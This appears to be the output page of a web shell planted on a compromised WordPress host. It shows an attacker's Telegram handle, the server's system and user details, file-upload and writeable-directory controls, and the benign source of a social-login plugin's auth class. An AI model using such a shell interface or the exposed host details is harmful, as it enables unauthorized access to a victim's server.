https://t.me/ARX49
Server : LiteSpeed
System : Linux server321.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : apotdzgr ( 7060)
PHP Version : 8.0.30
Disable Function : NONE
Directory :  /home/apotdzgr/public_html/wp-content/plugins/nextend-facebook-connect/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/apotdzgr/public_html/wp-content/plugins/nextend-facebook-connect/includes/auth.php
<?php

abstract class NextendSocialAuth {

    protected $providerID;

    protected $access_token_data;

    public function __construct($providerID) {
        $this->providerID = $providerID;
    }

    public function checkError() {

    }

    /**
     * @param string $access_token_data
     */
    public function setAccessTokenData($access_token_data) {
        $this->access_token_data = json_decode($access_token_data, true);
    }

    public abstract function createAuthUrl();

    public abstract function authenticate();

    public abstract function get($path, $data = array(), $endpoint = false);

    /**
     * @return bool
     */
    public abstract function hasAuthenticateData();

    /**
     * @return string
     */
    public abstract function getTestUrl();
}

https://t.me/ARX49 - 2025